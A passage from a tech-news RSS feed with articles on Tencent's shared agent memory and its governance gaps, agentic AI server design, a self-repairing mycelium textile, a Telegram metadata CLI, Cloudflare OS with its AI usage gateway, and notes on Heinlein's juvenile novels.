In practice, that's what Tencent calls an "Agent Loadout": a Scout agent doing research can be equipped with market research and competitive analysis assets, while a Builder agent gets the code graph and product docs it needs instead, rather than every agent getting access to everything.</p><p>Which assets an agent gets equipped with is governed through four visibility tiers:</p><ul><li><p><b>Private.</b> Readable only by the asset's owner.</p></li><li><p><b>Team.</b> Readable by anyone on the team.</p></li><li><p><b>Restricted.</b> Gated by user, role, or agent-level access control.</p></li><li><p><b>Agent.</b> Equipped to one specific agent within a team.</p></li></ul><p>New assets default to private, so sharing has to be a deliberate action rather than something that happens automatically.</p><h2>What happens when a memory is wrong</h2><p>That access model answers a real question, who is allowed to read a given memory asset. It does not answer a second one, which is what happens once a memory asset turns out to be wrong. Tencent's own documentation lays out ownership, versioning, and status tracking for each asset, but nothing in the documentation describes a correction or expiry process for a fact that's already been read and reused by other agents on a team, or a way to resolve it when two agents' memories of the same thing disagree.</p><p>That gap is what practitioners flagged within hours of the launch post.</p><p>"Shared memory makes the write path the interesting problem. Retrieval gets most of the attention, but a wrong fact written once now propagates to every teammate's agent instead of just yours. Curious how the governance layer handles correction and expiry,"<a href="https://x.com/BlakeMurphy/status/2085385624115138828"> Blake Murphy</a> wrote on X.</p><p>The concern wasn't only about fixing a bad fact after the fact. It was about the decision to leave something out of the record in the first place. "the governed part is the hard part. once teammates' agents can read each other's context, someone has to decide what never gets written down,"<a href="https://x.com/_virgil19/status/2085403856624922852"> Virgil Maro</a> wrote on X.</p><p>Others pushed further into what happens once two agents' memories actively contradict each other, not just go stale.</p><p>"The Code-Graph plus LLM-Wiki split is the right call. The part I'd want to see benchmarked: in shared mode, whose memory wins when two teammates' agents have written contradicting facts about the same module? Single-agent memory drifts slowly. Shared memory drifts fast, because one stale write propagates to people who never saw the session that produced it,"<a href="https://x.com/wgi_dev/status/2085382411613872341"> Austin Green</a> wrote on X.</p><p>The reaction wasn't uniformly critical. "Interesting shift: making memory a shared service turns agents into a real team rather than isolated bots. Governance will be the trickiest part, especially when facts conflict,"<a href="https://x.com/MoezZhioua/status/2085400880208126350"> Moez Zhioua</a> wrote on X.</p><p>None of these are edge cases specific to Tencent's implementation. A March 2026 paper on production multi-agent memory architecture,<a href="https://arxiv.org/html/2603.17787"> "Governed Memory: A Production Architecture for Multi-Agent Workflows,"</a> published independently of any single vendor, identifies governance fragmentation and silent quality degradation without feedback loops as structural risks in shared multi-agent memory generally. The pattern the paper describes matches what the commenters above pointed at directly: a wrong fact in a single-agent memory system costs one user a repeated correction, while the same wrong fact in a shared, team-wide memory system propagates to every agent that inherited it before anyone catches it.</p><h2>How Team Memory compares</h2><p>AI agent memory work in 2026 has mostly focused on a single agent remembering more, in one session, about one user:<a href="https://venturebeat.com/ai/enhancing-ai-agents-with-long-term-memory-insights-into-langmem-sdk-memobase-and-the-a-mem-framework"> LangChain's LangMem SDK</a>,<a href="https://venturebeat.com/orchestration/google-pm-open-sources-always-on-memory-agent-ditching-vector-databases-for"> Google's Always On Memory Agent</a>, and Anthropic's work inside the<a href="https://venturebeat.com/ai/anthropic-says-it-solved-the-long-running-ai-agent-problem-with-a-new-multi"> Claude Agent SDK</a> all work this way. A different line of work has focused on giving agents access to a shared model of business data. VB's own June survey found only 25% of enterprises had that kind of governed context layer in production, while vendors including<a href="https://venturebeat.com/data/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation"> AWS</a>, <a href="https://venturebeat.com/data/ai-agents-need-context-everywhere-they-run-even-where-the-cloud-cant-follow"> Couchbase, Oracle, Redis, and Pinecone</a> have all shipped versions of it this year.</p><p>Team Memory's closest existing comparison is likely Asana, which built<a href="https://venturebeat.com/orchestration/shared-memory-is-the-missing-layer-in-ai-orchestration"> shared memory across a company's AI teammates</a> so an agent doesn't need to be re-briefed on context another agent already has. Asana's CPO described the same tradeoff Tencent's practitioners are now raising,<a href="https://venturebeat.com/orchestration/asanas-ai-agents-share-memory-across-your-company-but-not-your-secrets"> an access control system built specifically to stop one agent's memory from leaking into a project another agent isn't cleared to see</a>. Tencent's version is open-source and portable across frameworks rather than scoped to one platform, but it's answering a question Asana's team already ran into while building a closed one.</p><p>For teams evaluating this category, the upside is real: agents stop relearning what the team already knows. The tradeoff is just as real: one bad write is no longer contained to one agent — it's inherited by every agent that reads from the shared pool, with no correction or expiry process yet in place to catch it.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI could force a rethink of enterprise AI server design, researchers say]]></title>
<description><![CDATA[Enterprises deploying agentic AI may need a new generation of AI servers as conventional GPU-centric infrastructure struggles to efficiently execute multi-step AI workflows, according to researchers from Microsoft Azure and the University of Texas at Austin.



Drawing on production telemetry fro...]]></description>
<link>https://tsecurity.de/de/3709697/it-security-nachrichten/agentic-ai-could-force-a-rethink-of-enterprise-ai-server-design-researchers-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709697/it-security-nachrichten/agentic-ai-could-force-a-rethink-of-enterprise-ai-server-design-researchers-say/</guid>
<pubDate>Fri, 07 Aug 2026 11:25:53 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises deploying agentic AI may need a new generation of AI servers as conventional GPU-centric infrastructure struggles to efficiently execute multi-step AI workflows, according to researchers from Microsoft Azure and the University of Texas at Austin.</p>



<p class="wp-block-paragraph">Drawing on production telemetry from Microsoft’s Azure cloud and experiments with representative open-source agent frameworks, the researchers found that AI agents spend far more time coordinating models, tools, and orchestration software than conventional inference systems assume. </p>



<p class="wp-block-paragraph">Rather than behaving like standalone LLM requests, agentic applications execute as dynamic workflows that repeatedly move work between CPUs, GPUs, and external services, exposing inefficiencies in today’s server designs.</p>



<p class="wp-block-paragraph">“Our study shows that agentic execution is fundamentally fragmented and heterogeneous,” the researchers <a href="https://arxiv.org/pdf/2608.04458">wrote</a> in the paper. “Each request expands into a workflow of LLM inferences, tool invocations, and orchestration decisions that repeatedly crosses the CPU-GPU boundary.”</p>



<p class="wp-block-paragraph">According to the paper, that execution pattern places the CPU on the application’s critical path because orchestration software and tools execute on the host while model inference runs on GPUs.</p>



<p class="wp-block-paragraph">The researchers said conventional server architectures are poorly matched to those workloads because fragmented execution strands CPU and GPU resources, different host-side software roles have different resource requirements, and multiplexing multiple agents increases coordination overhead.</p>



<h2 class="wp-block-heading">Production data points to fragmented execution</h2>



<p class="wp-block-paragraph">The researchers said a representative production request alternated between multiple LLM calls, tool discovery, tool execution, and orchestration before completing. In a controlled study using the CORAL framework, a single workload expanded into 580 LLM calls interleaved with 552 tool invocations, causing execution to “ping-pong between the two processors hundreds of times.”</p>



<p class="wp-block-paragraph">The study also found that host CPU utilization remained low for extended periods before rising sharply during bursts of tool execution, while GPU utilization varied widely depending on workflow composition, leaving some accelerators saturated and others idle.</p>



<p class="wp-block-paragraph">According to the researchers, the fragmented execution pattern leaves CPUs and GPUs underutilized on average while allowing either processor to become “a transient bottleneck on the workflow’s critical path,” making static resource provisioning inefficient for agentic workloads.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said the findings show enterprises should evaluate agentic AI infrastructure differently from conventional inference deployments.</p>



<p class="wp-block-paragraph">“Agentic AI is not a bigger chatbot; it is a distributed application with inference embedded inside it,” Gogia said. “The individual ingredients are familiar. The execution graph is new.”</p>



<p class="wp-block-paragraph">“The GPU remains indispensable, but it no longer owns the entire clock,” he added. “Tool time matched or beat inference time in more than 27 per cent of requests, and average utilisation is beginning to lie to infrastructure teams.”</p>



<h2 class="wp-block-heading">Researchers propose workflow-aware server design</h2>



<p class="wp-block-paragraph">Based on those findings, the researchers proposed a server architecture, called Agora, that dynamically reallocates CPU and GPU resources, separates scheduling, orchestration, and tool execution into dedicated host roles, and adapts resource allocation to workload behavior.</p>



<p class="wp-block-paragraph">“Agora dynamically harvests idle CPU cores for co-located throughput work, while protecting agentic tail latency against tool spikes. It also oversubscribes GPU memory by placing more agents on each GPU, prefetching the next agent’s state to hide swap latency,” the researchers wrote in the paper. “To match the machine to the heterogeneous roles, Agora pools cores by role and applies affinity-aware scheduling to restore locality. These techniques substantially improve CPU and GPU utilization and per-server throughput while preserving agent tail latency.”</p>



<p class="wp-block-paragraph">In their evaluation, the researchers reported that Agora increased host CPU utilization by about 30%, recovered about 95% of a co-located workload’s standalone throughput under low load, freed roughly one-third of GPUs through workload consolidation, increased generation throughput by 82%, and reduced tail latency by 2.5 times.</p>



<p class="wp-block-paragraph">Gogia said the findings indicate that infrastructure procurement should focus less on individual processors and more on how entire AI workflows execute.</p>



<p class="wp-block-paragraph">“The CPU is not returning to the throne; the throne itself is disappearing,” he said. “Competitive advantage is moving from the individual processor to the heterogeneous server, rack and runtime operating as one system.” He said organizations should “procure the workflow, not the box,” arguing that workload profiling and scheduling are likely to deliver greater benefits than sizing infrastructure based on model inference alone.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dress Made of Living Mycelium Can Renew and Repair Itself]]></title>
<description><![CDATA[Researchers in China have developed a living mycelium textile that can self-clean, renew its surface, and partially repair holes when treated with a nutrient solution and fresh fungus. The material can also gain added properties such as blue pigmentation or UV resistance by co-culturing it with y...]]></description>
<link>https://tsecurity.de/de/3709665/it-security-nachrichten/dress-made-of-living-mycelium-can-renew-and-repair-itself/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709665/it-security-nachrichten/dress-made-of-living-mycelium-can-renew-and-repair-itself/</guid>
<pubDate>Fri, 07 Aug 2026 11:25:25 +0200</pubDate>
<content:encoded><![CDATA[Researchers in China have developed a living mycelium textile that can self-clean, renew its surface, and partially repair holes when treated with a nutrient solution and fresh fungus. The material can also gain added properties such as blue pigmentation or UV resistance by co-culturing it with yeast or other fungi. Dezeen reports: The breakthrough from the researchers at the Shenzhen Institutes of Advanced Technology is a type of engineered living material (ELM) -- a material built off living organisms that stay active even after they're fabricated into their final form. [...] By working with living but dormant cordyceps militaris fungus instead, the researchers have been able to take advantage of its biological functions. The result is a material that is self-renewing and responsive to its environment, in ways that could one day transform architecture and clothing -- as seen in a prototype dress created together with material innovation company Peelshere.
 
It can also be adapted by mixing in other fungi or yeast, lead researcher Ke Li and her team detail in a paper in the peer-reviewed journal Science Advances. In it, they describe a "programmable fungal platform" where mycelium is treated like a modular system, with the sheet material forming a base structure and extra biological abilities, such as colour and UV resistance, becoming "plug-and-play" add-ons via other organisms. This gets their textile closer to the self-repair, environmental responsiveness and controllable functionality that is the promise of engineered living materials, they argue.
 
The ELM's self-renewing and semi-repairing functionality comes from the mycelium base structure. Following drying at 45 degrees, the material is not quite living and not quite dead, but instead in a "low-metabolic, dormant-like state", Li told Dezeen, meaning it is not actively growing. However, new growth can be triggered by applying a nutrient solution of potato water, leading the dormant mycelium to germinate, send out new fungal filaments and renew the material's surface. When this nutrient solution is applied over a hole, along with a small patch of fresh fungus, it triggers the living cells to grow across the gap, seamlessly repairing the surface without any adhesives or stitching. The material is also naturally self-cleaning, as it is hydrophobic. "Its distinctive surface texture, biological colouring, controlled repair and biodegradability may be particularly useful in applications where visual expression and a defined product lifetime are important," said Li.
 
"Further improvements in durability, moisture resistance, safety and manufacturing consistency would be needed before it could be considered for routine clothing or permanent architectural use."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Dress+Made+of+Living+Mycelium+Can+Renew+and+Repair+Itself%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F08%2F06%2F2210253%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F08%2F06%2F2210253%2Fdress-made-of-living-mycelium-can-renew-and-repair-itself%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/08/06/2210253/dress-made-of-living-mycelium-can-renew-and-repair-itself?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built Hody-Telepro – an open-source Python CLI for Telegram metadata inspection]]></title>
<description><![CDATA[Hi everyone! 👋 I d like to share my first public open-source Python project: **Hody-Telepro**. It s a command-line toolkit designed to inspect Telegram metadata through a clean and developer-friendly CLI. Current features: • Inspect users, bots, channels, and groups • Phone number lookup • Accoun...]]></description>
<link>https://tsecurity.de/de/3709457/linux-tipps/i-built-hody-telepro-an-open-source-python-cli-for-telegram-metadata-inspection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709457/linux-tipps/i-built-hody-telepro-an-open-source-python-cli-for-telegram-metadata-inspection/</guid>
<pubDate>Fri, 07 Aug 2026 04:41:17 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi everyone! 👋</p> <p>I d like to share my first public open-source Python project: **Hody-Telepro**.</p> <p>It s a command-line toolkit designed to inspect Telegram metadata through a clean and developer-friendly CLI.</p> <p>Current features:</p> <p>• Inspect users, bots, channels, and groups</p> <p>• Phone number lookup</p> <p>• Account creation date estimation</p> <p>• JSON output support</p> <p>• Batch processing</p> <p>• Fast CLI experience</p> <p>• Available on PyPI</p> <p>Installation:</p> <p>pip install hody-telepro</p> <p>Example:</p> <p>hody-telepro inspect @username</p> <p>GitHub:</p> <p><a href="https://github.com/f8c1/hody-telepro">https://github.com/f8c1/hody-telepro</a></p> <p>PyPI:</p> <p><a href="https://pypi.org/project/hody-telepro/">https://pypi.org/project/hody-telepro/</a></p> <p>This is the first public release, so I d really appreciate any feedback, bug reports, feature suggestions, or ideas to improve the project.</p> <p>Thank you! 🚀</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/f8c1"> /u/f8c1 </a> <br> <span><a href="https://github.com/f8c1/hody-telepro">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1vhetex/i_built_hodytelepro_an_opensource_python_cli_for/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709405/ai-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709405/ai-nachrichten/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise/</guid>
<pubDate>Fri, 07 Aug 2026 03:42:40 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4206332/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4700: Robert A. Heinlein: The Juveniles]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
Heinlein wrote a series of books under contract to Scribners that were aumed at younger readers, pre-teen and teen. Today we would call them Young Adult, but back then they were called Juveniles. But even an adult reader can enjoy many of these boo...]]></description>
<link>https://tsecurity.de/de/3709394/podcasts/hpr4700-robert-a-heinlein-the-juveniles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709394/podcasts/hpr4700-robert-a-heinlein-the-juveniles/</guid>
<pubDate>Fri, 07 Aug 2026 03:42:19 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<p>Heinlein wrote a series of books under contract to Scribners that were aumed at younger readers, pre-teen and teen. Today we would call them Young Adult, but back then they were called Juveniles. But even an adult reader can enjoy many of these books. Because they were aimed at younger readers, he could not always be as explicit as he might have liked, but if you pay attention you just might noticed he slipped in something subversive.</p>

<h1>Heinlein: The Juveniles</h1>
						
<p>As a boy I read voraciously. I remember my mother organizing weekly trips to the town library, where I would load up on books, and I quickly became focused on Science Fiction, along with the usual stuff kids read, like the Hardy Boys, Tom Swift, and the Walter Farley horse books. But the idea of going into space grabbed me very early. And one of the first authors I read was Heinlein. He had taken a leave from publishing during World War II, when he was doing research at the Philadelphia Navy Yard. But when the war was over, he set out to move beyond the “pulps” and expand the market for his stories. And one big market for him was what were called “juveniles” at the time, and would today be called “Young Adult”. I was reading adult fiction by the time I was 11 or 12, but before that (and even after that, in fact) I read these Heinlein novels with great relish.</p>

<p>Heinlein’s target audience for these novels was teenage boys. He did a few stories aimed at girls, but mostly he wrote for boys. And these were mostly “coming of age” stories where the teenage protagonist has adventures, and as a result grows and develops. They are very loosely related via some internal references, but should really be thought of as stand-alone stories. They also in some cases have references to his other stories, including the Future history stories. He wrote 13 of these novels, one per year, from 1947 to 1959. The series was published by Scribners until the last one was rejected by them. Heinlein then published it with a different publisher, and stopped writing these novels altogether in favor of more adult fiction. The novels roughly form a progression telling the story of space exploration. It starts with a trip to the Moon, then Venus, Mars, Jupiter’s moon, and so on until we reach the Lesser Magellanic Cloud.</p>

<ul>
<li><em><a href="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo" data-type="link" data-id="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo" target="_blank" rel="noreferrer noopener">Rocket Ship Galileo (1947)</a></em> – While readable, this initial effort was not up to Heinlein’s later standards. The plot concerns three teenagers who assist an uncle to build a rocket ship and go to the Moon. When they get there they discover Nazis have already arrived. The Nazis try to kill the group, but they succeed in turning the tables, stealing the Nazi ship, and returning to Earth as heroes. This novel became the basis (loosely) for the movie <em><a href="https://en.wikipedia.org/wiki/Destination_Moon_(film)" data-type="link" data-id="https://en.wikipedia.org/wiki/Destination_Moon_(film)" target="_blank" rel="noreferrer noopener">Destination Moon (1950)</a></em>, and I personally would consider the movie to be superior to the novel. It is also worth noting that the theory brought up in <em>Blowups Happen</em> reappears in this novel. They find evidence of an ancient Lunar civilization that was destroyed, and theorize that the craters on the moon were caused by the explosion of nuclear reactors that caused the extinction of the civilization.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Space_Cadet" data-type="link" data-id="https://en.wikipedia.org/wiki/Space_Cadet" target="_blank" rel="noreferrer noopener">Space Cadet (1948)</a></em> – This was in part the inspiration for the <em><a href="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)" data-type="link" data-id="https://en.wikipedia.org/wiki/Tom_Corbett,_Space_Cadet_(TV_series)" target="_blank" rel="noreferrer noopener">Tom Corbett</a></em> franchise, which licensed the name Space Cadet from Heinlein. It is about a young man who is accepted to the Academy for the Space Patrol. It follows him through his education in the Academy, and then into his first mission after graduating. This holds up better than the previous novel. And it is tied back to the story <em>The Long Watch</em> from the Future History. Part of the story takes place on an inhabited Venus that is cloudy and swampy.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Red_Planet_(novel)" data-type="link" data-id="https://en.wikipedia.org/wiki/Red_Planet_(novel)" target="_blank" rel="noreferrer noopener">Red Planet (1949)</a></em> – This is set on Mars, as it is also portrayed in <em><a href="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land" data-type="link" data-id="https://en.wikipedia.org/wiki/Stranger_in_a_Strange_Land" target="_blank" rel="noreferrer noopener">Stranger In A Strange Land (1961)</a></em>. Mars is inhabited by native Martians, but also by human colonists. It has the canals, and with seasonal changes the colonists migrate from north to south and back. A pair of teenage boys get caught up in a revolution when the evil corporation that controls the colony pushes the colonists too far. In the end you wish there really were canals and Martians.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Farmer_in_the_Sky" data-type="link" data-id="https://en.wikipedia.org/wiki/Farmer_in_the_Sky" target="_blank" rel="noreferrer noopener">Farmer In The Sky (1950)</a></em> – This is one of the best, as seen by the Retro Hugo this novel won in 2000. Jupiter’s moon Ganymede is being terraformed because Earth is overcrowded and food is rationed. A teenage boy and his family emigrate to Ganymede and try to make a life there, which they eventually succeed in doing. <em>The Green Hills of Earth</em> is mentioned here, tying this into the future History. There are frequent references to the Boy Scouts, due to the fact that the story ran as a serial in <em><a href="https://en.wikipedia.org/wiki/Scout_Life" data-type="link" data-id="https://en.wikipedia.org/wiki/Scout_Life" target="_blank" rel="noreferrer noopener">Boy’s Life</a></em> magazine.</li>

<li><em><a href="https://en.wikipedia.org/wiki/Between_Planets" data-type="link" data-id="https://en.wikipedia.org/wiki/Between_Planets" target="_blank" rel="noreferrer noopener">Between Planets (1951)</a></em> – A teenage boy is caught up in interplanetary intrigue. Venus and Mars have colonies, but Earth is trying to control them too much. So revolution is on the menu. This is clearly patterned in the colonial wars of the 18th and 19th centuries, such as the American Revolution against England. By this point the so-called “Juveniles” are really having more adult content, and reviewers re starting to rate them in comparison with adult science fiction. This novel was also first serialized in <em>Boy’s Life</em> magazine.</li>

